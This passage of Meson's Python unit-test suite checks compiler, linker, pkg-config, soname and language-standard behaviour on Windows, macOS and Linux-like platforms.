        self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
        # Using a script without an extension directly via command= works and adds the interpreter
        prog = ExternalProgram('test-script', command=[os.path.join(testdir, 'test-script'), '--help'])
        self.assertTrue(prog.found(), msg='test-script with full path not picked up via command=')
        self.assertPathEqual(prog.get_command()[0], python_command[0])
        self.assertPathEqual(prog.get_command()[2], '--help')
        self.assertPathBasenameEqual(prog.get_path(), 'test-script')
        # Ensure that WindowsApps gets removed from PATH
        path = os.environ['PATH']
        if 'WindowsApps' not in path:
            # Synthesize a WindowsApps entry so sanitization is exercised even
            # when the store dir isn't on this machine's PATH.
            username = os.environ['USERNAME']
            appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
            path = os.pathsep + appstore_dir
        path = ExternalProgram._windows_sanitize_path(path)
        self.assertNotIn('WindowsApps', path)

    def test_ignore_libs(self):
        '''
        Test that find_library on libs that are to be ignored returns an empty
        array of arguments. Must be a unit test because we cannot inspect
        ExternalLibraryHolder from build files.
        '''
        testdir = os.path.join(self.platform_test_dir, '1 basic')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_argument_syntax() != 'msvc':
            raise unittest.SkipTest('Not using MSVC')
        # To force people to update this test, and also test
        # the ignore list itself, assert its exact contents.
        self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
        for l in cc.ignore_libs:
            self.assertEqual(cc.find_library(l, env, []), [])

    def test_rc_depends_files(self):
        testdir = os.path.join(self.platform_test_dir, '5 resources')

        # resource compiler depfile generation is not yet implemented for msvc
        env = get_fake_env(testdir, self.builddir, self.prefix)
        depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}

        self.init(testdir)
        self.build()
        # Immediately rebuilding should not do anything
        self.assertBuildIsNoop()
        # Test compile_resources(depend_file:)
        # Changing mtime of sample.ico should rebuild prog
        self.utime(os.path.join(testdir, 'res', 'sample.ico'))
        self.assertRebuiltTarget('prog')
        # Test depfile generation by compile_resources
        # Changing mtime of resource.h should rebuild myres.rc and then prog
        if depfile_works:
            self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
            self.assertRebuiltTarget('prog')
        self.wipe()

        if depfile_works:
            testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
            self.init(testdir)
            self.build()
            # Immediately rebuilding should not do anything
            self.assertBuildIsNoop()
            # Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
            self.utime(os.path.join(testdir, 'res', 'resource.h'))
            self.assertRebuiltTarget('prog_1')

    def test_msvc_cpp17(self):
        testdir = os.path.join(self.unit_test_dir, '45 vscpp17')

        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_argument_syntax() != 'msvc':
            raise unittest.SkipTest('Test only applies to MSVC-like compilers')

        try:
            self.init(testdir)
        except subprocess.CalledProcessError:
            # According to Python docs, output is only stored when
            # using check_output. We don't use it, so we can't check
            # that the output is correct (i.e. that it failed due
            # to the right reason).
            return
        self.build()

    def test_install_pdb_introspection(self):
        testdir = os.path.join(self.platform_test_dir, '1 basic')

        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.get_argument_syntax() != 'msvc':
            raise unittest.SkipTest('Test only applies to MSVC-like compilers')

        self.init(testdir)
        installed = self.introspect('--installed')
        files = [os.path.basename(path) for path in installed.values()]

        # The PDB debug file must be part of the install manifest.
        self.assertTrue('prog.pdb' in files)

    def _check_ld(self, name: str, lang: str, expected: str) -> None:
        # Helper: set the <lang>_ld environment variable(s) to `name` and
        # verify the detected linker id matches `expected`.
        if not shutil.which(name):
            raise unittest.SkipTest('Could not find {}.'.format(name))
        envvars = [mesonbuild.envconfig.ENV_VAR_PROG_MAP['{}_ld'.format(lang)]]

        # Also test a deprecated variable if there is one.
        if f'{lang}_ld' in mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP:
            envvars.append(
                mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP[f'{lang}_ld'])

        for envvar in envvars:
            with mock.patch.dict(os.environ, {envvar: name}):
                env = get_fake_env()
                try:
                    comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
                except EnvironmentException:
                    raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
                self.assertEqual(comp.linker.id, expected)

    def test_link_environment_variable_lld_link(self):
        env = get_fake_env()
        comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
        if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
            raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
        self._check_ld('lld-link', 'c', 'lld-link')

    def test_link_environment_variable_link(self):
        env = get_fake_env()
        comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
        if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
            raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
        self._check_ld('link', 'c', 'link')

    def test_link_environment_variable_optlink(self):
        env = get_fake_env()
        comp = getattr(env, 'detect_c_compiler')(MachineChoice.HOST)
        if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
            raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
        self._check_ld('optlink', 'c', 'optlink')

    @skip_if_not_language('rust')
    def test_link_environment_variable_rust(self):
        self._check_ld('link', 'rust', 'link')

    @skip_if_not_language('d')
    def test_link_environment_variable_d(self):
        env = get_fake_env()
        comp = getattr(env, 'detect_d_compiler')(MachineChoice.HOST)
        if comp.id == 'dmd':
            raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
        self._check_ld('lld-link', 'd', 'lld-link')

    def test_pefile_checksum(self):
        try:
            import pefile
        except ImportError:
            if is_ci():
                # pefile must be installed on CI; a missing module there is a bug.
                raise
            raise unittest.SkipTest('pefile module not found')
        testdir = os.path.join(self.common_test_dir, '6 linkshared')
        self.init(testdir, extra_args=['--buildtype=release'])
        self.build()
        # Test that binaries have a non-zero checksum
        env = get_fake_env()
        cc = env.detect_c_compiler(MachineChoice.HOST)
        cc_id = cc.get_id()
        ld_id = cc.get_linker_id()
        dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
        exe = os.path.join(self.builddir, 'cppprog.exe')
        for f in (dll, exe):
            pe = pefile.PE(f)
            msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
            if cc_id == 'clang-cl':
                # Latest clang-cl tested (7.0) does not write checksums out
                self.assertFalse(pe.verify_checksum(), msg=msg)
            else:
                # Verify that a valid checksum was written by all other compilers
                self.assertTrue(pe.verify_checksum(), msg=msg)

    def test_qt5dependency_vscrt(self):
        '''
        Test that qt5 dependencies use the debug module suffix when b_vscrt is
        set to 'mdd'
        '''
        # Verify that the `b_vscrt` option is available
        env = get_fake_env()
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if OptionKey('b_vscrt') not in cc.base_options:
            raise unittest.SkipTest('Compiler does not support setting the VS CRT')
        # Verify that qmake is for Qt5
        if not shutil.which('qmake-qt5'):
            if not shutil.which('qmake') and not is_ci():
                raise unittest.SkipTest('QMake not found')
            output = subprocess.getoutput('qmake --version')
            if 'Qt version 5' not in output and not is_ci():
                raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
        # Setup with /MDd
        testdir = os.path.join(self.framework_test_dir, '4 qt')
        self.init(testdir, extra_args=['-Db_vscrt=mdd'])
        # Verify that we're linking to the debug versions of Qt DLLs
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        with open(build_ninja, 'r', encoding='utf-8') as f:
            contents = f.read()
            m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
        self.assertIsNotNone(m, msg=contents)

    def test_compiler_checks_vscrt(self):
        '''
        Test that the correct VS CRT is used when running compiler checks
        '''
        # Verify that the `b_vscrt` option is available
        env = get_fake_env()
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if OptionKey('b_vscrt') not in cc.base_options:
            raise unittest.SkipTest('Compiler does not support setting the VS CRT')

        def sanitycheck_vscrt(vscrt):
            # Every compiler sanity-check command in the log must carry the
            # expected CRT flag.
            checks = self.get_meson_log_sanitychecks()
            self.assertTrue(len(checks) > 0)
            for check in checks:
                self.assertIn(vscrt, check)

        testdir = os.path.join(self.common_test_dir, '1 trivial')
        self.init(testdir)
        sanitycheck_vscrt('/MDd')

        self.new_builddir()
        self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
        sanitycheck_vscrt('/MD')

        self.new_builddir()
        self.init(testdir, extra_args=['-Dbuildtype=release'])
        sanitycheck_vscrt('/MD')

        self.new_builddir()
        self.init(testdir, extra_args=['-Db_vscrt=md'])
        sanitycheck_vscrt('/MD')

        self.new_builddir()
        self.init(testdir, extra_args=['-Db_vscrt=mdd'])
        sanitycheck_vscrt('/MDd')

        self.new_builddir()
        self.init(testdir, extra_args=['-Db_vscrt=mt'])
        sanitycheck_vscrt('/MT')

        self.new_builddir()
        self.init(testdir, extra_args=['-Db_vscrt=mtd'])
        sanitycheck_vscrt('/MTd')

    def test_modules(self):
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest('C++ modules only work with the Ninja backend (not {}).'.format(self.backend.name))
        if 'VSCMD_VER' not in os.environ:
            raise unittest.SkipTest('C++ modules is only supported with Visual Studio.')
        if version_compare(os.environ['VSCMD_VER'], '<16.9.0'):
            raise unittest.SkipTest('C++ modules are only supported with VS 2019 Preview or newer.')
        self.init(os.path.join(self.unit_test_dir, '87 cpp modules'))
        self.build()


@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
    '''
    Tests that should run on macOS
    '''

    def setUp(self):
        super().setUp()
        self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')

    def test_apple_bitcode(self):
        '''
        Test that -fembed-bitcode is correctly added while compiling and
        -bitcode_bundle is added while linking when b_bitcode is true and not
        when it is false. This can't be an ordinary test case because we need
        to inspect the compiler database.
        '''
        testdir = os.path.join(self.platform_test_dir, '7 bitcode')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cc = env.detect_c_compiler(MachineChoice.HOST)
        if cc.id != 'clang':
            raise unittest.SkipTest('Not using Clang on OSX')
        # Try with bitcode enabled
        out = self.init(testdir, extra_args='-Db_bitcode=true')
        # Warning was printed
        self.assertRegex(out, 'WARNING:.*b_bitcode')
        # Compiler options were added
        for compdb in self.get_compdb():
            if 'module' in compdb['file']:
                # shared_module() sources must NOT get -fembed-bitcode
                self.assertNotIn('-fembed-bitcode', compdb['command'])
            else:
                self.assertIn('-fembed-bitcode', compdb['command'])
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        # Linker options were added
        with open(build_ninja, 'r', encoding='utf-8') as f:
            contents = f.read()
            m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
        self.assertIsNotNone(m, msg=contents)
        # Try with bitcode disabled
        self.setconf('-Db_bitcode=false')
        # Regenerate build
        self.build()
        for compdb in self.get_compdb():
            self.assertNotIn('-fembed-bitcode', compdb['command'])
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        with open(build_ninja, 'r', encoding='utf-8') as f:
            contents = f.read()
            m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
        self.assertIsNone(m, msg=contents)

    def test_apple_bitcode_modules(self):
        '''
        Same as above, just for shared_module()
        '''
        testdir = os.path.join(self.common_test_dir, '149 shared module resolving symbol in executable')
        # Ensure that it builds even with bitcode enabled
        self.init(testdir, extra_args='-Db_bitcode=true')
        self.build()
        self.run_tests()

    def _get_darwin_versions(self, fname):
        # Helper: return (compatibility_version, current_version) of a built
        # library as reported by `otool -L`.
        fname = os.path.join(self.builddir, fname)
        out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
        m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
        self.assertIsNotNone(m, msg=out)
        return m.groups()

    @skipIfNoPkgconfig
    def test_library_versioning(self):
        '''
        Ensure that compatibility_version and current_version are set correctly
        '''
        testdir = os.path.join(self.platform_test_dir, '2 library versions')
        self.init(testdir)
        self.build()
        targets = {}
        for t in self.introspect('--targets'):
            targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
        self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
        self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
        self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
        self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
        self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))

    def test_duplicate_rpath(self):
        testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
        # We purposely pass a duplicate rpath to Meson, in order
        # to ascertain that Meson does not call install_name_tool
        # with duplicate -delete_rpath arguments, which would
        # lead to erroring out on installation
        env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
        self.init(testdir, override_envvars=env)
        self.build()
        self.install()

    def test_removing_unused_linker_args(self):
        # NOTE(review): no explicit assertion here — a successful init() with
        # these linker-ish CFLAGS appears to be the whole test; confirm intent.
        testdir = os.path.join(self.common_test_dir, '105 has arg')
        env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
        self.init(testdir, override_envvars=env)


@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
    '''
    Tests that should run on Linux, macOS, and *BSD
    '''

    def test_basic_soname(self):
        '''
        Test that the soname is set correctly for shared libraries. This
        can't be an ordinary test case because we need to run `readelf`
        and actually check the soname.
        https://github.com/mesonbuild/meson/issues/785
        '''
        testdir = os.path.join(self.common_test_dir, '4 shared')
        self.init(testdir)
        self.build()
        lib1 = os.path.join(self.builddir, 'libmylib.so')
        soname = get_soname(lib1)
        self.assertEqual(soname, 'libmylib.so')

    def test_custom_soname(self):
        '''
        Test that the soname is set correctly for shared libraries when
        a custom prefix and/or suffix is used. This can't be an ordinary
        test case because we need to run `readelf` and actually check the
        soname.
        https://github.com/mesonbuild/meson/issues/785
        '''
        testdir = os.path.join(self.common_test_dir, '25 library versions')
        self.init(testdir)
        self.build()
        lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
        soname = get_soname(lib1)
        self.assertEqual(soname, 'prefixsomelib.suffix')

    def test_pic(self):
        '''
        Test that -fPIC is correctly added to static libraries when
        b_staticpic is true and not when it is false. This can't be an
        ordinary test case because we need to inspect the compiler database.
        '''
        if is_windows() or is_cygwin() or is_osx():
            raise unittest.SkipTest('PIC not relevant')

        testdir = os.path.join(self.common_test_dir, '3 static')
        self.init(testdir)
        compdb = self.get_compdb()
        self.assertIn('-fPIC', compdb[0]['command'])
        self.setconf('-Db_staticpic=false')
        # Regenerate build
        self.build()
        compdb = self.get_compdb()
        self.assertNotIn('-fPIC', compdb[0]['command'])

    @mock.patch.dict(os.environ)
    def test_pkgconfig_gen(self):
        '''
        Test that generated pkg-config files can be found and have the correct
        version and link args. This can't be an ordinary test case because we
        need to run pkg-config outside of a Meson build file.
        https://github.com/mesonbuild/meson/issues/889
        '''
        testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
        self.init(testdir)
        env = get_fake_env(testdir, self.builddir, self.prefix)
        kwargs = {'required': True, 'silent': True}
        os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
        foo_dep = PkgConfigDependency('libfoo', env, kwargs)
        self.assertTrue(foo_dep.found())
        self.assertEqual(foo_dep.get_version(), '1.0')
        self.assertIn('-lfoo', foo_dep.get_link_args())
        self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
        self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')

        libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
        self.assertTrue(libhello_nolib.found())
        self.assertEqual(libhello_nolib.get_link_args(), [])
        self.assertEqual(libhello_nolib.get_compile_args(), [])
        self.assertEqual(libhello_nolib.get_pkgconfig_variable('foo', {}), 'bar')

    def test_pkgconfig_gen_deps(self):
        '''
        Test that generated pkg-config files correctly handle dependencies
        '''
        testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
        self.init(testdir)
        privatedir1 = self.privatedir

        self.new_builddir()
        testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen', 'dependencies')
        self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
        privatedir2 = self.privatedir

        env = {
            'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
            'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
        }
        self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)

        # pkg-config strips some duplicated flags so we have to parse the
        # generated file ourself.
        expected = {
            'Requires': 'libexposed',
            'Requires.private': 'libfoo >= 1.0',
            'Libs': '-L${libdir} -llibmain -pthread -lcustom',
            'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
            'Cflags': '-I${includedir} -pthread -DCUSTOM',
        }
        if is_osx() or is_haiku():
            expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
        with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
            matched_lines = 0
            for line in f:
                parts = line.split(':', 1)
                if parts[0] in expected:
                    key = parts[0]
                    val = parts[1].strip()
                    expected_val = expected[key]
                    self.assertEqual(expected_val, val)
                    matched_lines += 1
            self.assertEqual(len(expected), matched_lines)

        cmd = ['pkg-config', 'requires-test']
        out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
        # OpenBSD's pkg-config prints version constraints without spaces.
        if not is_openbsd():
            self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
        else:
            self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))

        cmd = ['pkg-config', 'requires-private-test']
        out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
        if not is_openbsd():
            self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
        else:
            self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))

        cmd = ['pkg-config', 'pub-lib-order']
        out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
        self.assertEqual(out, ['-llibmain2', '-llibinternal'])

        # See common/45 pkgconfig-gen/meson.build for description of the case this test
        with open(os.path.join(privatedir1, 'simple2.pc')) as f:
            content = f.read()
            self.assertIn('Libs: -L${libdir} -lsimple2 -lsimple1', content)
            self.assertIn('Libs.private: -lz', content)

        with open(os.path.join(privatedir1, 'simple3.pc')) as f:
            content = f.read()
            self.assertEqual(1, content.count('-lsimple3'))

        with open(os.path.join(privatedir1, 'simple5.pc')) as f:
            content = f.read()
            self.assertNotIn('-lstat2', content)

    @mock.patch.dict(os.environ)
    def test_pkgconfig_uninstalled(self):
        # Build one project, then resolve it from a second project via the
        # uninstalled pkg-config files in meson-uninstalled.
        testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
        self.init(testdir)
        self.build()

        os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
        if is_cygwin():
            os.environ['PATH'] += os.pathsep + self.builddir

        self.new_builddir()
        testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen', 'dependencies')
        self.init(testdir)
        self.build()
        self.run_tests()

    def test_pkg_unfound(self):
        testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
        self.init(testdir)
        # A not-found dependency must not leak placeholder link args into the
        # generated .pc file.
        with open(os.path.join(self.privatedir, 'somename.pc')) as f:
            pcfile = f.read()
        self.assertFalse('blub_blob_blib' in pcfile)

    def test_vala_c_warnings(self):
        '''
        Test that no warnings are emitted for C code generated by Vala. This
        can't be an ordinary test case because we need to inspect the compiler
        database.
        https://github.com/mesonbuild/meson/issues/864
        '''
        if not shutil.which('valac'):
            raise unittest.SkipTest('valac not installed.')
        testdir = os.path.join(self.vala_test_dir, '5 target glib')
        self.init(testdir)
        compdb = self.get_compdb()
        vala_command = None
        c_command = None
        for each in compdb:
            if each['file'].endswith('GLib.Thread.c'):
                vala_command = each['command']
            elif each['file'].endswith('GLib.Thread.vala'):
                continue
            elif each['file'].endswith('retcode.c'):
                c_command = each['command']
            else:
                m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
                raise AssertionError(m)
        self.assertIsNotNone(vala_command)
        self.assertIsNotNone(c_command)
        # -w suppresses all warnings, should be there in Vala but not in C
        self.assertIn(" -w ", vala_command)
        self.assertNotIn(" -w ", c_command)
        # -Wall enables all warnings, should be there in C but not in Vala
        self.assertNotIn(" -Wall ", vala_command)
        self.assertIn(" -Wall ", c_command)
        # -Werror converts warnings to errors, should always be there since it's
        # injected by an unrelated piece of code and the project has werror=true
        self.assertIn(" -Werror ", vala_command)
        self.assertIn(" -Werror ", c_command)

    @skipIfNoPkgconfig
    def test_qtdependency_pkgconfig_detection(self):
        '''
        Test that qt4 and qt5 detection with pkgconfig works.
        '''
        # Verify Qt4 or Qt5 can be found with pkg-config
        qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
        qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
        testdir = os.path.join(self.framework_test_dir, '4 qt')
        self.init(testdir, extra_args=['-Dmethod=pkg-config'])
        # Confirm that the dependency was found with pkg-config
        mesonlog = self.get_meson_log()
        if qt4 == 0:
            self.assertRegex('\n'.join(mesonlog),
                             r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
        if qt5 == 0:
            self.assertRegex('\n'.join(mesonlog),
                             r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')

    @skip_if_not_base_option('b_sanitize')
    def test_generate_gir_with_address_sanitizer(self):
        if is_cygwin():
            raise unittest.SkipTest('asan not available on Cygwin')
        if is_openbsd():
            raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')

        testdir = os.path.join(self.framework_test_dir, '7 gnome')
        self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
        self.build()

    def test_qt5dependency_qmake_detection(self):
        '''
        Test that qt5 detection with qmake works. This can't be an ordinary
        test case because it involves setting the environment.
        '''
        # Verify that qmake is for Qt5
        if not shutil.which('qmake-qt5'):
            if not shutil.which('qmake'):
                raise unittest.SkipTest('QMake not found')
            output = subprocess.getoutput('qmake --version')
            if 'Qt version 5' not in output:
                raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
        # Disable pkg-config codepath and force searching with qmake/qmake-qt5
        testdir = os.path.join(self.framework_test_dir, '4 qt')
        self.init(testdir, extra_args=['-Dmethod=qmake'])
        # Confirm that the dependency was found with qmake
        mesonlog = self.get_meson_log()
        self.assertRegex('\n'.join(mesonlog),
                         r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')

    def glob_sofiles_without_privdir(self, g):
        # Helper: glob() but excluding Meson's private '.p' directories.
        files = glob(g)
        return [f for f in files if not f.endswith('.p')]

    def _test_soname_impl(self, libpath, install):
        if is_cygwin() or is_osx():
            raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')

        testdir = os.path.join(self.unit_test_dir, '1 soname')
        self.init(testdir)
        self.build()
        if install:
            self.install()

        # File without aliases set.
        nover = os.path.join(libpath, 'libnover.so')
        self.assertPathExists(nover)
        self.assertFalse(os.path.islink(nover))
        self.assertEqual(get_soname(nover), 'libnover.so')
        self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)

        # File with version set
        verset = os.path.join(libpath, 'libverset.so')
        self.assertPathExists(verset + '.4.5.6')
        self.assertEqual(os.readlink(verset), 'libverset.so.4')
        self.assertEqual(get_soname(verset), 'libverset.so.4')
        self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)

        # File with soversion set
        soverset = os.path.join(libpath, 'libsoverset.so')
        self.assertPathExists(soverset + '.1.2.3')
        self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
        self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
        self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)

        # File with version and soversion set to same values
        settosame = os.path.join(libpath, 'libsettosame.so')
        self.assertPathExists(settosame + '.7.8.9')
        self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
        self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
        self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)

        # File with version and soversion set to different values
        bothset = os.path.join(libpath, 'libbothset.so')
        self.assertPathExists(bothset + '.1.2.3')
        self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
        self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
        self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
        self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)

    def test_soname(self):
        # Check sonames/aliases in the build directory (not installed).
        self._test_soname_impl(self.builddir, False)

    def test_installed_soname(self):
        # Check sonames/aliases after installation.
        libdir = self.installdir + os.path.join(self.prefix, self.libdir)
        self._test_soname_impl(libdir, True)

    def test_compiler_check_flags_order(self):
        '''
        Test that compiler check flags override all other flags. This can't
        be an ordinary test case because it needs the environment to be set.
        '''
        testdir = os.path.join(self.common_test_dir, '37 has function')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        cpp = env.detect_cpp_compiler(MachineChoice.HOST)
        Oflag = '-O3'
        OflagCPP = Oflag
        if cpp.get_id() in ('clang', 'gcc'):
            # prevent developers from adding "int main(int argc, char **argv)"
            # to small Meson checks unless these parameters are actually used
            OflagCPP += ' -Werror=unused-parameter'
        env = {'CFLAGS': Oflag,
               'CXXFLAGS': OflagCPP}
        self.init(testdir, override_envvars=env)
        cmds = self.get_meson_log_compiler_checks()
        for cmd in cmds:
            if cmd[0] == 'ccache':
                cmd = cmd[1:]
            # Verify that -I flags from the `args` kwarg are first
            # This is set in the '37 has function' test case
            self.assertEqual(cmd[1], '-I/tmp')
            # Verify that -O3 set via the environment is overridden by -O0
            Oargs = [arg for arg in cmd if arg.startswith('-O')]
            self.assertEqual(Oargs, [Oflag, '-O0'])

    def _test_stds_impl(self, testdir: str, compiler: 'Compiler') -> None:
        # Per-compiler feature gates for newer language standards.
        has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
                     compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
                     compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
        has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
                         compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
                         compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
        has_cpp20 = (compiler.get_id() not in {'clang', 'gcc'} or
                     compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=10.0.0', None) or
                     compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=10.0.0'))
        has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
                   compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
                   compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
        # Check that all the listed -std=xxx options for this compiler work just fine when used
        # https://en.wikipedia.org/wiki/Xcode#Latest_versions
        # https://www.gnu.org/software/gcc/projects/cxx-status.html
        key = OptionKey('std', lang=compiler.language)
        for v in compiler.get_options()[key].choices:
            # we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
            # thus, C++ first
            if '++17' in v and not has_cpp17:
                continue
            elif '++2a' in v and not has_cpp2a_c17:
                # https://en.cppreference.com/w/cpp/compiler_support
                continue
            elif '++20' in v and not has_cpp20:
                continue
            # now C
            elif '17' in v and not has_cpp2a_c17:
                continue
            elif '18' in v and not has_c18:
                continue
            self.init(testdir, extra_args=[f'-D{key!s}={v}'])
            cmd = self.get_compdb()[0]['command']
            # c++03 and gnu++03 are not understood by ICC, don't try to look for them
            skiplist = frozenset([
                ('intel', 'c++03'),
                ('intel', 'gnu++03')])
            if v != 'none' and not (compiler.get_id(), v) in skiplist:
                cmd_std = " -std={} ".format(v)
                self.assertIn(cmd_std, cmd)
            try:
                self.build()
            except Exception:
                print(f'{key!s} was {v!r}')
                raise
            self.wipe()
        # Check that an invalid std option in CFLAGS/CPPFLAGS fails
        # Needed because by default ICC ignores invalid options
        cmd_std = '-std=FAIL'
        if compiler.language == 'c':
            env_flag_name = 'CFLAGS'
        elif compiler.language == 'cpp':
            env_flag_name = 'CXXFLAGS'
        else:
            # NOTE(review): 'p' is undefined here — this raises NameError, not
            # NotImplementedError, if ever reached; likely meant
            # compiler.language. Unreachable for the c/cpp callers below.
            raise NotImplementedError('Language {} not defined.'.format(p))
        env = {}
        env[env_flag_name] = cmd_std
        with self.assertRaises((subprocess.CalledProcessError,
                                mesonbuild.mesonlib.EnvironmentException),
